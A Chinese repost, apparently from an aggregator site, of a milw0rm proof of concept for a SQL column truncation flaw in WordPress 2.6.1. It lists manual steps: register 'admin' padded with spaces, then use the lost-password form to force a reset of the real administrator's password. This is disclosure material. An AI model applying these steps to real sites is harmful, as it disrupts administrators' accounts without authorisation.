WordPress 2.6.1 SQL Column Truncation Vulnerability脚本之家fenghuang - 牛牛娱乐

WordPress 2.6.1 SQL Column Truncation Vulnerability脚本之家fenghuang

2019-02-02 08:00:04 | 作者: 震博 | 标签: | 浏览: 8275

用wordpress的要注意了 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: https://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# https://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated admin account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admins password changed, but new password will be send to correct admin email ;/ # milw0rm.com

版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表牛牛娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章